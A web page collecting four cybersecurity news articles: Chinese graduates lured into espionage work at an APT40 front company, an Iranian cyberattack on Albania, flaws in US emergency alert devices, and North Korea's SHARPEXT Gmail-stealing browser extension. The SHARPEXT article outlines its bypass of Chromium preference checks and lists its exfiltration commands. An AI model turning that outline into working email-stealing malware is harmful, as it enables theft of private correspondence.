Connect with us

Biz & IT

China lured graduate jobseekers into digital espionage

Published

on

Chinese university students have been lured to work at a secretive technology company that masked the true nature of their jobs: researching western targets for spying and translating hacked documents as part of Beijing’s industrial-scale intelligence regime.

The Financial Times has identified and contacted 140 potential translators, mostly recent graduates who have studied English at public universities in Hainan, Sichuan and Xi’an. They had responded to job adverts at Hainan Xiandun, a company that was located in the tropical southern island of Hainan.

The application process included translation tests on sensitive documents obtained from US government agencies and instructions to research individuals at Johns Hopkins University, a key intelligence target.

Hainan Xiandun is alleged by a 2021 US federal indictment to have been a cover for the Chinese hacking group APT40. Western intelligence agencies have accused APT40 of infiltrating government agencies, companies and universities across the US, Canada, Europe and the Middle East, under the orders of China’s Ministry of State Security (MSS).

The FBI sought to disrupt the activities of Hainan Xiandun last July by indicting three state security officials in Hainan province—Ding Xiaoyang, Cheng Qingmin and Zhu Yunmin—for their alleged role in establishing the company as a front for state-backed espionage. Another man mentioned in the indictment, Wu Shurong, is believed to be a hacker who helped supervise employees at Hainan Xiandun.

Western intelligence services also seek out prospective spies from universities, with applicants undergoing rigorous vetting and training before joining the likes of the CIA in the US or the UK’s GCHQ signals intelligence agency.

But Chinese graduates targeted by Hainan Xiandun appear to have been unwittingly drawn into a life of espionage. Job adverts from the company were posted on university websites for translators without further explanation of the nature of the work.

This could have life-long consequences, as individuals identified as having co-operated with the MSS through their work for Hainan Xiandun are likely to face difficulty in living and working in western countries, a key motivation for many students who study foreign languages.

The FT contacted all 140 individuals on a leaked list of candidates compiled by security officials in the region to corroborate the authenticity of the applications. Several of those contacted initially confirmed their identities, but ended phone calls after being asked about their links to Hainan Xiandun. A few discussed their experience of the hiring process.

Their applications provide insight into the tactics of APT40, known for targeting biomedical, robotics and maritime research institutions as part of wider efforts to gain knowledge of western industrial strategy and steal sensitive data.

Hacking on that scale requires a huge workforce of English speakers who can help identify hacking targets, cyber technicians who can access adversaries’ systems and intelligence officers to analyze the stolen material.

Zhang, an English language graduate who applied to Hainan Xiandun, told the FT that a recruiter had asked him to go beyond conventional translation duties by researching the Johns Hopkins Applied Physics Laboratory, with instructions to find out information on the institution, including the CVs of the directors on its board, the building’s architecture and details of research contracts it had struck with clients.

The APL, a big recipient of US Department of Defense research funds, is likely to be of significant intelligence interest to Beijing and the individuals who work there prime hacking targets.

The instruction document asked the job candidates to download “software to get behind the Great Firewall.” It warns that the research will involve consulting websites such as Facebook, which is banned in China and so requires a VPN, software that masks the location of the user in order to gain access.

“It was very clear that this was not a translation company,” said Zhang, who decided against continuing with his application.

Dakota Cary, an expert in Chinese cyber espionage and former security analyst at Georgetown University, said the student translators were likely to be helping with researching organizations or individuals who might prove to be fruitful sources of sensitive information.

“The fact that you’re going to have to use a VPN, that you will need to be doing your own research and you need good language skills, all says to me that these students will be identifying hacking targets,” he said.

Cary, who testified earlier this year to the US-China economic and security review commission on Beijing’s cyber capabilities, said the instruction to investigate Johns Hopkins was an indicator of the level of initiative and ability to acquire specialist knowledge that the translators were expected to demonstrate.

One security official in the region said the revelations were evidence that the MSS was using university students as a “recruitment pipeline” for its spying activities.

Antony Blinken, US secretary of state, has previously condemned the MSS for building an “ecosystem of criminal contract hackers” who engage in both state-sponsored activities and financially motivated cyber crime. Blinken added that these hackers cost governments and businesses “billions of dollars” in stolen intellectual property, ransom payments and cyber defenses.

Hainan Xiandun asked the applicants to translate a document from the US Office of Infrastructure Research and Development containing technical explanations on preventing corrosion on transport networks and infrastructure. This appeared to test prospective employees’ abilities to interpret complex scientific concepts and terminology.

“It was a very weird process,” said Cindy, an English language student from a respected Chinese university. “I applied online and then the HR person sent me a highly technical test translation.” She decided against continuing with the application.

Adam Kozy, a former FBI official who worked most recently at cyber security company CrowdStrike, said he had not heard of western intelligence enlisting university students without them being given security clearance to collect intelligence.

“The MSS do everything very informally and they like the gray areas,” he said. “It’s interesting to see that they’re relying on a young student workforce to do a lot of the dirty work that may have those knock-on consequences later in life and most likely are not fully explaining those potential risks.”

The MSS did not respond to requests for comment.

Hainan Xiandun solicited applications on university recruitment sites and appears to have a close relationship with Hainan University. The company was registered on the first floor of the university library, home to the student computer room.

One job advert posted on the university’s foreign languages department website called for applications from English-speaking female students and Communist party members. The advert has been deleted since the FT’s queries regarding this story.

Several student applicants to Hainan Xiandun had won school prizes for their language skills and others held the added distinction of holding party membership.

According to the FBI’s indictment, MSS officers “co-ordinated with staff and professors at universities in Hainan and elsewhere in China” to further their intelligence goals. Personnel at one Hainan-based university also helped support and manage Hainan Xiandun as a front company, “including through payroll, benefits and a mailing address,” the indictment reads.

While the FBI accused the university of assisting the MSS in identifying and recruiting hackers and linguists to “penetrate and steal” from computer networks, it does not mention the university’s role in commandeering students to help the cause.

In response to the FT’s findings, Michael Misumi, chief information officer at Johns Hopkins APL, said that “like many technical organizations” the APL “must respond to many cyber threats and takes appropriate measures to continuously defend itself and its systems.”

Hainan University did not respond to requests for comment.

Applicants’ names have been changed to protect their identities

© 2022 The Financial Times Ltd. All rights reserved Not to be redistributed, copied, or modified in any way.

Continue Reading

Biz & IT

Cyberattack on Albanian government suggests new Iranian aggression

Published

on

Enlarge / Tirane, Albania.

Pawel Toczynski | Getty Images

In mid-July, a cyberattack on the Albanian government knocked out state websites and public services for hours. With Russia’s war raging in Ukraine, the Kremlin might seem like the likeliest suspect. But research published on Thursday by the threat intelligence firm Mandiant attributes the attack to Iran. And while Tehran’s espionage operations and digital meddling have shown up all over the world, Mandiant researchers say that a disruptive attack from Iran on a NATO member is a noteworthy escalation.

The digital attacks targeting Albania on July 17 came ahead of the “World Summit of Free Iran,” a conference scheduled to convene in the town of Manëz in western Albania on July 23 and 24. The summit was affiliated with the Iranian opposition group Mujahadeen-e-Khalq, or the People’s Mojahedin Organization of Iran (often abbreviated MEK, PMOI, or MKO). The conference was postponed the day before it was set to begin because of reported, unspecified “terrorist” threats.

Mandiant researchers say that attackers deployed ransomware from the Roadsweep family and may have also utilized a previously unknown backdoor, dubbed Chimneysweep, as well as a new strain of the Zeroclear wiper. Past use of similar malware, the timing of the attacks, other clues from the Roadsweep ransomware note, and activity from actors claiming responsibility for the attacks on Telegram all point to Iran, Mandiant says.

“This is an aggressive escalatory step that we have to recognize,” says John Hultquist, Mandiant’s vice president of intelligence. “Iranian espionage happens all the time all over the world. The difference here is this isn’t espionage. These are disruptive attacks, which affect the lives of everyday Albanians who live within the NATO alliance. And it was essentially a coercive attack to force the hand of the government.”

Iran has conducted aggressive hacking campaigns in the Middle East and particularly in Israel, and its state-backed hackers have penetrated and probed manufacturing, supply, and critical infrastructure organizations. In November 2021, the US and Australian governments warned that Iranian hackers were actively working to gain access to an array of networks related to transportation, health care, and public health entities, among others. “These Iranian government-sponsored APT actors can leverage this access for follow-on operations, such as data exfiltration or encryption, ransomware, and extortion,” the Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency wrote at the time.

Tehran has limited how far its attacks have gone, though, largely keeping to data exfiltration and reconnaissance on the global stage. The country has, however, participated in influence operations, disinformation campaigns, and efforts to meddle in foreign elections, including targeting the US.

“We’ve become used to seeing Iran being aggressive in the Middle East where that activity just has never stopped, but outside of the Middle East they’ve been far more restrained,” Hultquist says. “I’m concerned that they may be more willing to leverage their capability outside of the region. And they clearly have no qualms about targeting NATO states, which suggests to me that whatever deterrents we believe exist between us and them may not exist at all.”

With Iran claiming that it now has the ability to produce nuclear warheads, and representatives from the country meeting with US officials in Vienna about a possible revival of the 2015 nuclear deal between the countries, any signal about Iran’s possible intentions and risk tolerance when it comes to dealing with NATO are significant.

This story originally appeared on wired.com.

Continue Reading

Biz & IT

“Huge flaw” threatens US emergency alert system, DHS researcher warns

Published

on

Enlarge / Obstruction light with bokeh city background

The US Department of Homeland Security is warning of vulnerabilities in the nation’s emergency broadcast network that makes it possible for hackers to issue bogus warnings over radio and TV stations.

“We recently became aware of certain vulnerabilities in EAS encoder/decoder devices that, if not updated to most recent software versions, could allow an actor to issue EAS alerts over the host infrastructure (TV, radio, cable network),” the DHS’s Federal Emergency Management Agency (FEMA) warned. “This exploit was successfully demonstrated by Ken Pyle, a security researcher at CYBIR.com, and may be presented as a proof of concept at the upcoming DEFCON 2022 conference in Las Vegas, August 11-14.”

Pyle told reporters at CNN and Bleeping Computer that the vulnerabilities reside in the Monroe Electronics R189 One-Net DASDEC EAS, an Emergency Alert System encoder and decoder. TV and radio stations use the equipment to transmit emergency alerts. The researcher told Bleeping Computer that “multiple vulnerabilities and issues (confirmed by other researchers) haven’t been patched for several years and snowballed into a huge flaw.”

“When asked what can be done after successful exploitation, Pyle said: ‘I can easily obtain access to the credentials, certs, devices, exploit the web server, send fake alerts via crafts message, have them valid / pre-empting signals at will. I can also lock legitimate users out when I do, neutralizing or disabling a response,’” Bleeping Computer added.

This isn’t the first time federal officials have warned of vulnerabilities in the emergency alert system.

Continue Reading

Biz & IT

North Korea-backed hackers have a clever way to read your Gmail

Published

on

Getty Images

Researchers have unearthed never-before-seen malware that hackers from North Korea have been using to surreptitiously read and download email and attachments from infected users’ Gmail and AOL accounts.

The malware, dubbed SHARPEXT by researchers from security firm Volexity, uses clever means to install a browser extension for the Chrome and Edge browsers, Volexity reported in a blog post. The extension can’t be detected by the email services, and since the browser has already been authenticated using any multifactor authentication protections in place, this increasingly popular security measure plays no role in reining in the account compromise.

The malware has been in use for “well over a year,” Volexity said, and is the work of a hacking group the company tracks as SharpTongue. The group is sponsored by North Korea’s government and overlaps with a group tracked as Kimsuky by other researchers. SHARPEXT is targeting organizations in the US, Europe, and South Korea that work on nuclear weapons and other issues North Korea deems important to its national security.

Volexity President Steven Adair said in an email that the extension gets installed “by way of spear phishing and social engineering where the victim is fooled into opening a malicious document. Previously we have seen DPRK threat actors launch spear phishing attacks where the entire objective was to get the victim to install a browser extension vs it being a post exploitation mechanism for persistence and data theft.” In its current incarnation, the malware works only on Windows, but Adair said there’s no reason it couldn’t be broadened to infect browsers running on macOS or Linux, too.

The blog post added: “Volexity’s own visibility shows the extension has been quite successful, as logs obtained by Volexity show the attacker was able to successfully steal thousands of emails from multiple victims through the malware’s deployment.”

Installing a browser extension during a phishing operation without the end-user noticing isn’t easy. SHARPEXT developers have clearly paid attention to research like what’s published here, here, and here, which shows how a security mechanism in the Chromium browser engine prevents malware from making changes to sensitive user settings. Each time a legitimate change is made, the browser takes a cryptographic hash of some of the code. At startup, the browser verifies the hashes, and if any of them don’t match, the browser requests the old settings be restored.

For attackers to work around this protection, they must first extract the following from the computer they’re compromising:

  • A copy of the resources.pak file from the browser (which contains the HMAC seed used by Chrome)
  • The user’s S-ID value
  • The original Preferences and Secure Preferences files from the user’s system

After modifying the preference files, SHARPEXT automatically loads the extension and executes a PowerShell script that enables DevTools, a setting that allows the browser to run customized code and settings.

“The script runs in an infinite loop checking for processes associated with the targeted browsers,” Volexity explained. “If any targeted browsers are found running, the script checks the title of the tab for a specific keyword (for example’ 05101190,’ or ‘Tab+’ depending on the SHARPEXT version). The specific keyword is inserted into the title by the malicious extension when an active tab changes or when a page is loaded.”

Volexity

The post continued:

The keystrokes sent are equivalent to Control+Shift+J, the shortcut to enable the DevTools panel. Lastly, the PowerShell script hides the newly opened DevTools window by using the ShowWindow() API and the SW_HIDE flag. At the end of this process, DevTools is enabled on the active tab, but the window is hidden.

In addition, this script is used to hide any windows that could alert the victim. Microsoft Edge, for example, periodically displays a warning message to the user (Figure 5) if extensions are running in developer mode. The script constantly checks if this window appears and hides it by using the ShowWindow() and the SW_HIDE flag.

Volexity

Once installed, the extension can perform the following requests:

HTTP POST Data Description
mode=list List previously collected email from the victim to ensure duplicates are not uploaded. This list is continuously updated as SHARPEXT executes.
mode=domain List email domains with which the victim has previously communicated. This list is continuously updated as SHARPEXT executes.
mode=black Collect a blacklist of email senders that should be ignored when collecting email from the victim.
mode=newD&d=[data] Add a domain to the list of all domains viewed by the victim.
mode=attach&name=[data]&idx=[data]&body=[data] Upload a new attachment to the remote server.
mode=new&mid=[data]&mbody=[data] Upload Gmail data to the remote server.
mode=attlist Commented by the attacker; receive an attachments list to be exfiltrated.
mode=new_aol&mid=[data]&mbody=[data] Upload AOL data to the remote server.

SHARPEXT allows the hackers to create lists of email addresses to ignore and to keep track of email or attachments that have already been stolen.

Volexity created the following summary of the orchestration of the various SHARPEXT components it analyzed:

Volexity

The blog post provides images, file names, and other indicators that trained people can use to determine if they have been targeted or infected by this malware. The company warned that the threat it poses has grown over time and isn’t likely to go away anytime soon.

“When Volexity first encountered SHARPEXT, it seemed to be a tool in early development containing numerous bugs, an indication the tool was immature,” the company said. “The latest updates and ongoing maintenance demonstrate the attacker is achieving its goals, finding value in continuing to refine it.”

Continue Reading

Trending